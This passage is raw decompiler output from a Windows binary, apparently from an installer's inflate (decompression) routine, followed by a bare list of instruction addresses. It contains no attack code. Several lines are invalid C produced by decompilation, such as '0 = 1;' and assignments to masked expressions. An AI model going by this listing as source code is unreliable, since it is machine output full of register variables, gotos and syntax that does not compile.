                                                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                												__ebx = __ebx + 8;
                                                                                												__eflags = __ebx;
                                                                                											}
                                                                                											L130:
                                                                                											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                											__esi[3] = __esi[3] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                											__ecx = __eax;
                                                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                											__ebx = __ebx - __eax;
                                                                                											__eflags = __ebx;
                                                                                											 *__esi = 5;
                                                                                											goto L131;
                                                                                										case 5:
                                                                                											L131:
                                                                                											__eax =  *(__ebp - 0x30);
                                                                                											__edx = __esi[3];
                                                                                											__eax = __eax - __esi;
                                                                                											__ecx = __eax - __esi - 0x1ba0;
                                                                                											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                												__ecx = __eax;
                                                                                												__ecx = __eax - __edx;
                                                                                												__eflags = __ecx;
                                                                                											} else {
                                                                                												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                											}
                                                                                											__eflags = __esi[1];
                                                                                											 *(__ebp - 0x20) = __ecx;
                                                                                											if(__esi[1] != 0) {
                                                                                												L135:
                                                                                												__edi =  *(__ebp - 0x2c);
                                                                                												do {
                                                                                													L136:
                                                                                													__eflags = __edi;
                                                                                													if(__edi != 0) {
                                                                                														goto L152;
                                                                                													}
                                                                                													L137:
                                                                                													__edi = __esi[0x26e8];
                                                                                													__eflags = __eax - __edi;
                                                                                													if(__eax != __edi) {
                                                                                														L143:
                                                                                														__esi[0x26ea] = __eax;
                                                                                														__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                														__eax = __esi[0x26ea];
                                                                                														__ecx = __esi[0x26e9];
                                                                                														__eflags = __eax - __ecx;
                                                                                														 *(__ebp - 0x30) = __eax;
                                                                                														if(__eax >= __ecx) {
                                                                                															__edi = __esi[0x26e8];
                                                                                															__edi = __esi[0x26e8] - __eax;
                                                                                															__eflags = __edi;
                                                                                														} else {
                                                                                															__ecx = __ecx - __eax;
                                                                                															__edi = __ecx - __eax - 1;
                                                                                														}
                                                                                														__edx = __esi[0x26e8];
                                                                                														__eflags = __eax - __edx;
                                                                                														 *(__ebp - 8) = __edx;
                                                                                														if(__eax == __edx) {
                                                                                															__edx =  &(__esi[0x6e8]);
                                                                                															__eflags = __ecx - __edx;
                                                                                															if(__ecx != __edx) {
                                                                                																__eax = __edx;
                                                                                																__eflags = __eax - __ecx;
                                                                                																 *(__ebp - 0x30) = __eax;
                                                                                																if(__eax >= __ecx) {
                                                                                																	__edi =  *(__ebp - 8);
                                                                                																	__edi =  *(__ebp - 8) - __eax;
                                                                                																	__eflags = __edi;
                                                                                																} else {
                                                                                																	__ecx = __ecx - __eax;
                                                                                																	__edi = __ecx;
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                														__eflags = __edi;
                                                                                														if(__edi == 0) {
                                                                                															goto L183;
                                                                                														} else {
                                                                                															goto L152;
                                                                                														}
                                                                                													}
                                                                                													L138:
                                                                                													__ecx = __esi[0x26e9];
                                                                                													__edx =  &(__esi[0x6e8]);
                                                                                													__eflags = __ecx - __edx;
                                                                                													if(__ecx == __edx) {
                                                                                														goto L143;
                                                                                													}
                                                                                													L139:
                                                                                													__eax = __edx;
                                                                                													__eflags = __eax - __ecx;
                                                                                													if(__eax >= __ecx) {
                                                                                														__edi = __edi - __eax;
                                                                                														__eflags = __edi;
                                                                                													} else {
                                                                                														__ecx = __ecx - __eax;
                                                                                														__edi = __ecx;
                                                                                													}
                                                                                													__eflags = __edi;
                                                                                													if(__edi == 0) {
                                                                                														goto L143;
                                                                                													}
                                                                                													L152:
                                                                                													__ecx =  *(__ebp - 0x20);
                                                                                													 *__eax =  *__ecx;
                                                                                													__eax = __eax + 1;
                                                                                													__ecx = __ecx + 1;
                                                                                													__edi = __edi - 1;
                                                                                													__eflags = __ecx - __esi[0x26e8];
                                                                                													 *(__ebp - 0x30) = __eax;
                                                                                													 *(__ebp - 0x20) = __ecx;
                                                                                													 *(__ebp - 0x2c) = __edi;
                                                                                													if(__ecx == __esi[0x26e8]) {
                                                                                														__ecx =  &(__esi[0x6e8]);
                                                                                														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                													}
                                                                                													_t357 =  &(__esi[1]);
                                                                                													 *_t357 = __esi[1] - 1;
                                                                                													__eflags =  *_t357;
                                                                                												} while ( *_t357 != 0);
                                                                                											}
                                                                                											goto L23;
                                                                                										case 6:
                                                                                											L156:
                                                                                											__eax =  *(__ebp - 0x2c);
                                                                                											__edi =  *(__ebp - 0x30);
                                                                                											__eflags = __eax;
                                                                                											if(__eax != 0) {
                                                                                												L172:
                                                                                												__cl = __esi[2];
                                                                                												 *__edi = __cl;
                                                                                												__edi = __edi + 1;
                                                                                												__eax = __eax - 1;
                                                                                												 *(__ebp - 0x30) = __edi;
                                                                                												 *(__ebp - 0x2c) = __eax;
                                                                                												goto L23;
                                                                                											}
                                                                                											L157:
                                                                                											__ecx = __esi[0x26e8];
                                                                                											__eflags = __edi - __ecx;
                                                                                											if(__edi != __ecx) {
                                                                                												L163:
                                                                                												__esi[0x26ea] = __edi;
                                                                                												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                												__edi = __esi[0x26ea];
                                                                                												__ecx = __esi[0x26e9];
                                                                                												__eflags = __edi - __ecx;
                                                                                												 *(__ebp - 0x30) = __edi;
                                                                                												if(__edi >= __ecx) {
                                                                                													__eax = __esi[0x26e8];
                                                                                													__eax = __esi[0x26e8] - __edi;
                                                                                													__eflags = __eax;
                                                                                												} else {
                                                                                													__ecx = __ecx - __edi;
                                                                                													__eax = __ecx - __edi - 1;
                                                                                												}
                                                                                												__edx = __esi[0x26e8];
                                                                                												__eflags = __edi - __edx;
                                                                                												 *(__ebp - 8) = __edx;
                                                                                												if(__edi == __edx) {
                                                                                													__edx =  &(__esi[0x6e8]);
                                                                                													__eflags = __ecx - __edx;
                                                                                													if(__ecx != __edx) {
                                                                                														__edi = __edx;
                                                                                														__eflags = __edi - __ecx;
                                                                                														 *(__ebp - 0x30) = __edi;
                                                                                														if(__edi >= __ecx) {
                                                                                															__eax =  *(__ebp - 8);
                                                                                															__eax =  *(__ebp - 8) - __edi;
                                                                                															__eflags = __eax;
                                                                                														} else {
                                                                                															__ecx = __ecx - __edi;
                                                                                															__eax = __ecx;
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                												__eflags = __eax;
                                                                                												if(__eax == 0) {
                                                                                													goto L183;
                                                                                												} else {
                                                                                													goto L172;
                                                                                												}
                                                                                											}
                                                                                											L158:
                                                                                											__eax = __esi[0x26e9];
                                                                                											__edx =  &(__esi[0x6e8]);
                                                                                											__eflags = __eax - __edx;
                                                                                											if(__eax == __edx) {
                                                                                												goto L163;
                                                                                											}
                                                                                											L159:
                                                                                											__edi = __edx;
                                                                                											__eflags = __edi - __eax;
                                                                                											if(__edi >= __eax) {
                                                                                												__ecx = __ecx - __edi;
                                                                                												__eflags = __ecx;
                                                                                												__eax = __ecx;
                                                                                											} else {
                                                                                												__eax = __eax - __edi;
                                                                                												__eax = __eax - 1;
                                                                                											}
                                                                                											__eflags = __eax;
                                                                                											if(__eax != 0) {
                                                                                												goto L172;
                                                                                											} else {
                                                                                												goto L163;
                                                                                											}
                                                                                										case 7:
                                                                                											L173:
                                                                                											__eflags = __ebx - 7;
                                                                                											if(__ebx > 7) {
                                                                                												__ebx = __ebx - 8;
                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                												_t380 = __ebp - 0x38;
                                                                                												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                												__eflags =  *_t380;
                                                                                											}
                                                                                											goto L175;
                                                                                										case 8:
                                                                                											L4:
                                                                                											while(_t425 < 3) {
                                                                                												if( *(_t448 - 0x34) == 0) {
                                                                                													goto L182;
                                                                                												} else {
                                                                                													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                													_t425 = _t425 + 8;
                                                                                													continue;
                                                                                												}
                                                                                											}
                                                                                											_t425 = _t425 - 3;
                                                                                											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                											asm("sbb ecx, ecx");
                                                                                											_t408 = _t406 >> 1;
                                                                                											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                											if(_t408 == 0) {
                                                                                												L24:
                                                                                												 *_t446 = 9;
                                                                                												_t436 = _t425 & 0x00000007;
                                                                                												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                												_t425 = _t425 - _t436;
                                                                                												goto L180;
                                                                                											}
                                                                                											L6:
                                                                                											_t411 = _t408 - 1;
                                                                                											if(_t411 == 0) {
                                                                                												L13:
                                                                                												__eflags =  *0x42e3d0;
                                                                                												if( *0x42e3d0 != 0) {
                                                                                													L22:
                                                                                													_t412 =  *0x40a444; // 0x9
                                                                                													_t446[4] = _t412;
                                                                                													_t413 =  *0x40a448; // 0x5
                                                                                													_t446[4] = _t413;
                                                                                													_t414 =  *0x42d24c; // 0x0
                                                                                													_t446[5] = _t414;
                                                                                													_t415 =  *0x42d248; // 0x0
                                                                                													_t446[6] = _t415;
                                                                                													L23:
                                                                                													 *_t446 =  *_t446 & 0x00000000;
                                                                                													goto L180;
                                                                                												} else {
                                                                                													_t26 = _t448 - 8;
                                                                                													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                													__eflags =  *_t26;
                                                                                													_t416 = 0x42d250;
                                                                                													goto L15;
                                                                                													L20:
                                                                                													 *_t416 = _t438;
                                                                                													_t416 = _t416 + 4;
                                                                                													__eflags = _t416 - 0x42d6d0;
                                                                                													if(_t416 < 0x42d6d0) {
                                                                                														L15:
                                                                                														__eflags = _t416 - 0x42d48c;
                                                                                														_t438 = 8;
                                                                                														if(_t416 > 0x42d48c) {
                                                                                															__eflags = _t416 - 0x42d650;
                                                                                															if(_t416 >= 0x42d650) {
                                                                                																__eflags = _t416 - 0x42d6b0;
                                                                                																if(_t416 < 0x42d6b0) {
                                                                                																	_t438 = 7;
                                                                                																}
                                                                                															} else {
                                                                                																_t438 = 9;
                                                                                															}
                                                                                														}
                                                                                														goto L20;
                                                                                													} else {
                                                                                														E00407272(0x42d250, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d24c, 0x40a444, 0x42db50, _t448 - 8);
                                                                                														_push(0x1e);
                                                                                														_pop(_t440);
                                                                                														_push(5);
                                                                                														_pop(_t419);
                                                                                														memset(0x42d250, _t419, _t440 << 2);
                                                                                														_t450 = _t450 + 0xc;
                                                                                														_t442 = 0x42d250 + _t440;
                                                                                														E00407272(0x42d250, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d248, 0x40a448, 0x42db50, _t448 - 8);
                                                                                														 *0x42e3d0 =  *0x42e3d0 + 1;
                                                                                														__eflags =  *0x42e3d0;
                                                                                														goto L22;
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                											L7:
                                                                                											_t423 = _t411 - 1;
                                                                                											if(_t423 == 0) {
                                                                                												 *_t446 = 0xb;
                                                                                												goto L180;
                                                                                											}
                                                                                											L8:
                                                                                											if(_t423 != 1) {
                                                                                												goto L180;
                                                                                											}
                                                                                											goto L9;
                                                                                										case 9:
                                                                                											while(1) {
                                                                                												L27:
                                                                                												__eflags = __ebx - 0x20;
                                                                                												if(__ebx >= 0x20) {
                                                                                													break;
                                                                                												}
                                                                                												L25:
                                                                                												__eflags =  *(__ebp - 0x34);
                                                                                												if( *(__ebp - 0x34) == 0) {
                                                                                													goto L182;
                                                                                												}
                                                                                												L26:
                                                                                												__eax =  *(__ebp - 0x38);
                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                												__ecx = __ebx;
                                                                                												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                												__ebx = __ebx + 8;
                                                                                												__eflags = __ebx;
                                                                                											}
                                                                                											L28:
                                                                                											__eax =  *(__ebp - 0x40);
                                                                                											__ebx = 0;
                                                                                											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                											 *(__ebp - 0x40) = 0;
                                                                                											__eflags = __eax;
                                                                                											__esi[1] = __eax;
                                                                                											if(__eax == 0) {
                                                                                												goto L53;
                                                                                											}
                                                                                											L29:
                                                                                											_push(0xa);
                                                                                											_pop(__eax);
                                                                                											goto L54;
                                                                                										case 0xa:
                                                                                											L30:
                                                                                											__eflags =  *(__ebp - 0x34);
                                                                                											if( *(__ebp - 0x34) == 0) {
                                                                                												goto L182;
                                                                                											}
                                                                                											L31:
                                                                                											__eax =  *(__ebp - 0x2c);
                                                                                											__eflags = __eax;
                                                                                											if(__eax != 0) {
                                                                                												L48:
                                                                                												__eflags = __eax -  *(__ebp - 0x34);
                                                                                												if(__eax >=  *(__ebp - 0x34)) {
                                                                                													__eax =  *(__ebp - 0x34);
                                                                                												}
                                                                                												__ecx = __esi[1];
                                                                                												__eflags = __ecx - __eax;
                                                                                												__edi = __ecx;
                                                                                												if(__ecx >= __eax) {
                                                                                													__edi = __eax;
                                                                                												}
                                                                                												__eax = E00405DA1( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                												_t80 =  &(__esi[1]);
                                                                                												 *_t80 = __esi[1] - __edi;
                                                                                												__eflags =  *_t80;
                                                                                												if( *_t80 == 0) {
                                                                                													L53:
                                                                                													__eax = __esi[0x145];
                                                                                													L54:
                                                                                													 *__esi = __eax;
                                                                                												}
                                                                                												goto L180;
                                                                                											}
                                                                                											L32:
                                                                                											__ecx = __esi[0x26e8];
                                                                                											__edx =  *(__ebp - 0x30);
                                                                                											__eflags = __edx - __ecx;
                                                                                											if(__edx != __ecx) {
                                                                                												L38:
                                                                                												__esi[0x26ea] = __edx;
                                                                                												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                												__edx = __esi[0x26ea];
                                                                                												__ecx = __esi[0x26e9];
                                                                                												__eflags = __edx - __ecx;
                                                                                												 *(__ebp - 0x30) = __edx;
                                                                                												if(__edx >= __ecx) {
                                                                                													__eax = __esi[0x26e8];
                                                                                													__eax = __esi[0x26e8] - __edx;
                                                                                													__eflags = __eax;
                                                                                												} else {
                                                                                													__ecx = __ecx - __edx;
                                                                                													__eax = __ecx - __edx - 1;
                                                                                												}
                                                                                												__edi = __esi[0x26e8];
                                                                                												 *(__ebp - 0x2c) = __eax;
                                                                                												__eflags = __edx - __edi;
                                                                                												if(__edx == __edi) {
                                                                                													__edx =  &(__esi[0x6e8]);
                                                                                													__eflags = __edx - __ecx;
                                                                                													if(__eflags != 0) {
                                                                                														 *(__ebp - 0x30) = __edx;
                                                                                														if(__eflags >= 0) {
                                                                                															__edi = __edi - __edx;
                                                                                															__eflags = __edi;
                                                                                															__eax = __edi;
                                                                                														} else {
                                                                                															__ecx = __ecx - __edx;
                                                                                															__eax = __ecx;
                                                                                														}
                                                                                														 *(__ebp - 0x2c) = __eax;
                                                                                													}
                                                                                												}
                                                                                												__eflags = __eax;
                                                                                												if(__eax == 0) {
                                                                                													goto L183;
                                                                                												} else {
                                                                                													goto L48;
                                                                                												}
                                                                                											}
                                                                                											L33:
                                                                                											__eax = __esi[0x26e9];
                                                                                											__edi =  &(__esi[0x6e8]);
                                                                                											__eflags = __eax - __edi;
                                                                                											if(__eax == __edi) {
                                                                                												goto L38;
                                                                                											}
                                                                                											L34:
                                                                                											__edx = __edi;
                                                                                											__eflags = __edx - __eax;
                                                                                											 *(__ebp - 0x30) = __edx;
                                                                                											if(__edx >= __eax) {
                                                                                												__ecx = __ecx - __edx;
                                                                                												__eflags = __ecx;
                                                                                												__eax = __ecx;
                                                                                											} else {
                                                                                												__eax = __eax - __edx;
                                                                                												__eax = __eax - 1;
                                                                                											}
                                                                                											__eflags = __eax;
                                                                                											 *(__ebp - 0x2c) = __eax;
                                                                                											if(__eax != 0) {
                                                                                												goto L48;
                                                                                											} else {
                                                                                												goto L38;
                                                                                											}
                                                                                										case 0xb:
                                                                                											goto L56;
                                                                                										case 0xc:
                                                                                											L60:
                                                                                											__esi[1] = __esi[1] >> 0xa;
                                                                                											__eax = (__esi[1] >> 0xa) + 4;
                                                                                											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                												goto L68;
                                                                                											}
                                                                                											goto L61;
                                                                                										case 0xd:
                                                                                											while(1) {
                                                                                												L93:
                                                                                												__eax = __esi[1];
                                                                                												__ecx = __esi[2];
                                                                                												__edx = __eax;
                                                                                												__eax = __eax & 0x0000001f;
                                                                                												__edx = __edx >> 5;
                                                                                												__eax = __edx + __eax + 0x102;
                                                                                												__eflags = __esi[2] - __eax;
                                                                                												if(__esi[2] >= __eax) {
                                                                                													break;
                                                                                												}
                                                                                												L73:
                                                                                												__eax = __esi[0x143];
                                                                                												while(1) {
                                                                                													L76:
                                                                                													__eflags = __ebx - __eax;
                                                                                													if(__ebx >= __eax) {
                                                                                														break;
                                                                                													}
                                                                                													L74:
                                                                                													__eflags =  *(__ebp - 0x34);
                                                                                													if( *(__ebp - 0x34) == 0) {
                                                                                														goto L182;
                                                                                													}
                                                                                													L75:
                                                                                													__ecx =  *(__ebp - 0x38);
                                                                                													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                													__ecx = __ebx;
                                                                                													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                													__ebx = __ebx + 8;
                                                                                													__eflags = __ebx;
                                                                                												}
                                                                                												L77:
                                                                                												__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                                                												__eax = __eax &  *(__ebp - 0x40);
                                                                                												__ecx = __esi[0x144];
                                                                                												__eax = __esi[0x144] + __eax * 4;
                                                                                												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                												__eflags = __eax - 0x10;
                                                                                												 *(__ebp - 0x14) = __eax;
                                                                                												if(__eax >= 0x10) {
                                                                                													L79:
                                                                                													__eflags = __eax - 0x12;
                                                                                													if(__eax != 0x12) {
                                                                                														__eax = __eax + 0xfffffff2;
                                                                                														 *(__ebp - 8) = 3;
                                                                                													} else {
                                                                                														_push(7);
                                                                                														 *(__ebp - 8) = 0xb;
                                                                                														_pop(__eax);
                                                                                													}
                                                                                													while(1) {
                                                                                														L84:
                                                                                														__ecx = __eax + __edx;
                                                                                														__eflags = __ebx - __eax + __edx;
                                                                                														if(__ebx >= __eax + __edx) {
                                                                                															break;
                                                                                														}
                                                                                														L82:
                                                                                														__eflags =  *(__ebp - 0x34);
                                                                                														if( *(__ebp - 0x34) == 0) {
                                                                                															goto L182;
                                                                                														}
                                                                                														L83:
                                                                                														__ecx =  *(__ebp - 0x38);
                                                                                														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                														__ecx = __ebx;
                                                                                														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                														__ebx = __ebx + 8;
                                                                                														__eflags = __ebx;
                                                                                													}
                                                                                													L85:
                                                                                													__ecx = __edx;
                                                                                													__ebx = __ebx - __edx;
                                                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                													 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                													__edx =  *(__ebp - 8);
                                                                                													__ebx = __ebx - __eax;
                                                                                													__edx =  *(__ebp - 8) + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                													__ecx = __eax;
                                                                                													__eax = __esi[1];
                                                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                													__ecx = __esi[2];
                                                                                													__eax = __eax >> 5;
                                                                                													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                													__eax = __eax & 0x0000001f;
                                                                                													__eax = __edi + __eax + 0x102;
                                                                                													__edi = __edx + __ecx;
                                                                                													__eflags = __edx + __ecx - __eax;
                                                                                													if(__edx + __ecx > __eax) {
                                                                                														goto L9;
                                                                                													}
                                                                                													L86:
                                                                                													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                													if( *(__ebp - 0x14) != 0x10) {
                                                                                														L89:
                                                                                														__edi = 0;
                                                                                														__eflags = 0;
                                                                                														L90:
                                                                                														__eax = __esi + 0xc + __ecx * 4;
                                                                                														do {
                                                                                															L91:
                                                                                															 *__eax = __edi;
                                                                                															__ecx = __ecx + 1;
                                                                                															__eax = __eax + 4;
                                                                                															__edx = __edx - 1;
                                                                                															__eflags = __edx;
                                                                                														} while (__edx != 0);
                                                                                														__esi[2] = __ecx;
                                                                                														continue;
                                                                                													}
                                                                                													L87:
                                                                                													__eflags = __ecx - 1;
                                                                                													if(__ecx < 1) {
                                                                                														goto L9;
                                                                                													}
                                                                                													L88:
                                                                                													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                													goto L90;
                                                                                												}
                                                                                												L78:
                                                                                												__ecx = __edx;
                                                                                												__ebx = __ebx - __edx;
                                                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                												__ecx = __esi[2];
                                                                                												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                												__esi[2] = __esi[2] + 1;
                                                                                											}
                                                                                											L94:
                                                                                											__eax = __esi[1];
                                                                                											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                											__edi = __eax;
                                                                                											__eax = __eax >> 5;
                                                                                											__edi = __edi & 0x0000001f;
                                                                                											__ecx = 0x101;
                                                                                											__eax = __eax & 0x0000001f;
                                                                                											__edi = __edi + 0x101;
                                                                                											__eax = __eax + 1;
                                                                                											__edx = __ebp - 0xc;
                                                                                											 *(__ebp - 0x14) = __eax;
                                                                                											 &(__esi[0x148]) = __ebp - 4;
                                                                                											 *(__ebp - 4) = 9;
                                                                                											__ebp - 0x18 =  &(__esi[3]);
                                                                                											 *(__ebp - 0x10) = 6;
                                                                                											__eax = E00407272( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                											__eflags =  *(__ebp - 4);
                                                                                											if( *(__ebp - 4) == 0) {
                                                                                												__eax = __eax | 0xffffffff;
                                                                                												__eflags = __eax;
                                                                                											}
                                                                                											__eflags = __eax;
                                                                                											if(__eax != 0) {
                                                                                												goto L9;
                                                                                											} else {
                                                                                												L97:
                                                                                												__ebp - 0xc =  &(__esi[0x148]);
                                                                                												__ebp - 0x10 = __ebp - 0x1c;
                                                                                												__eax = __esi + 0xc + __edi * 4;
                                                                                												__eax = E00407272(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                												__eflags = __eax;
                                                                                												if(__eax != 0) {
                                                                                													goto L9;
                                                                                												}
                                                                                												L98:
                                                                                												__eax =  *(__ebp - 0x10);
                                                                                												__eflags =  *(__ebp - 0x10);
                                                                                												if( *(__ebp - 0x10) != 0) {
                                                                                													L100:
                                                                                													__cl =  *(__ebp - 4);
                                                                                													 *__esi =  *__esi & 0x00000000;
                                                                                													__eflags =  *__esi;
                                                                                													__esi[4] = __al;
                                                                                													__eax =  *(__ebp - 0x18);
                                                                                													__esi[5] =  *(__ebp - 0x18);
                                                                                													__eax =  *(__ebp - 0x1c);
                                                                                													__esi[4] = __cl;
                                                                                													__esi[6] =  *(__ebp - 0x1c);
                                                                                													goto L101;
                                                                                												}
                                                                                												L99:
                                                                                												__eflags = __edi - 0x101;
                                                                                												if(__edi > 0x101) {
                                                                                													goto L9;
                                                                                												}
                                                                                												goto L100;
                                                                                											}
                                                                                										case 0xe:
                                                                                											goto L9;
                                                                                										case 0xf:
                                                                                											L175:
                                                                                											__eax =  *(__ebp - 0x30);
                                                                                											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                											__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                											__ecx = __esi[0x26ea];
                                                                                											__edx = __esi[0x26e9];
                                                                                											__eflags = __ecx - __edx;
                                                                                											 *(__ebp - 0x30) = __ecx;
                                                                                											if(__ecx >= __edx) {
                                                                                												__eax = __esi[0x26e8];
                                                                                												__eax = __esi[0x26e8] - __ecx;
                                                                                												__eflags = __eax;
                                                                                											} else {
                                                                                												__edx = __edx - __ecx;
                                                                                												__eax = __edx - __ecx - 1;
                                                                                											}
                                                                                											__eflags = __ecx - __edx;
                                                                                											 *(__ebp - 0x2c) = __eax;
                                                                                											if(__ecx != __edx) {
                                                                                												L183:
                                                                                												__edi = 0;
                                                                                												goto L10;
                                                                                											} else {
                                                                                												L179:
                                                                                												__eax = __esi[0x145];
                                                                                												__eflags = __eax - 8;
                                                                                												 *__esi = __eax;
                                                                                												if(__eax != 8) {
                                                                                													L184:
                                                                                													0 = 1;
                                                                                													goto L10;
                                                                                												}
                                                                                												goto L180;
                                                                                											}
                                                                                									}
                                                                                								}
                                                                                								L181:
                                                                                								goto L9;
                                                                                							}
                                                                                							L70:
                                                                                							if( *__edi == __eax) {
                                                                                								goto L72;
                                                                                							}
                                                                                							L71:
                                                                                							__esi[2] = __esi[2] & __eax;
                                                                                							 *__esi = 0xd;
                                                                                							goto L93;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				L182:
                                                                                				_t443 = 0;
                                                                                				_t446[0x147] =  *(_t448 - 0x40);
                                                                                				_t446[0x146] = _t425;
                                                                                				( *(_t448 + 8))[1] = 0;
                                                                                				goto L11;
                                                                                			}









                                                                                0x00406865
                                                                                0x00406870
                                                                                0x00406870
                                                                                0x00406ad9
                                                                                0x00406ad9
                                                                                0x00406ae3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406ae9
                                                                                0x00406ae9
                                                                                0x00406aed
                                                                                0x00406af0
                                                                                0x00406af0
                                                                                0x00406af4
                                                                                0x00406afa
                                                                                0x00406afa
                                                                                0x00406afd
                                                                                0x00406b00
                                                                                0x00406b06
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b08
                                                                                0x00406b2a
                                                                                0x00406b2a
                                                                                0x00406b2d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b0a
                                                                                0x00406b0e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b14
                                                                                0x00406b14
                                                                                0x00406b17
                                                                                0x00406b1a
                                                                                0x00406b1f
                                                                                0x00406b21
                                                                                0x00406b24
                                                                                0x00406b27
                                                                                0x00406b27
                                                                                0x00406b2f
                                                                                0x00406b2f
                                                                                0x00406b35
                                                                                0x00406b38
                                                                                0x00406b3b
                                                                                0x00406b3b
                                                                                0x00406b42
                                                                                0x00406b46
                                                                                0x00406b4a
                                                                                0x00406b4d
                                                                                0x00406b50
                                                                                0x00406b56
                                                                                0x00406b5b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b5d
                                                                                0x00406b71
                                                                                0x00406b71
                                                                                0x00406b75
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406b5f
                                                                                0x00406b62
                                                                                0x00406b62
                                                                                0x00406b69
                                                                                0x00406b6e
                                                                                0x00406b6e
                                                                                0x00406b6e
                                                                                0x00406b77
                                                                                0x00406b77
                                                                                0x00406b7a
                                                                                0x00406b88
                                                                                0x00406b8e
                                                                                0x00406b93
                                                                                0x00406b99
                                                                                0x00406b9f
                                                                                0x00406ba5
                                                                                0x00406bac
                                                                                0x00406bc0
                                                                                0x00406bc0
                                                                                0x0040718f
                                                                                0x0040718f
                                                                                0x0040718f
                                                                                0x00407194
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004067cc
                                                                                0x004067cc
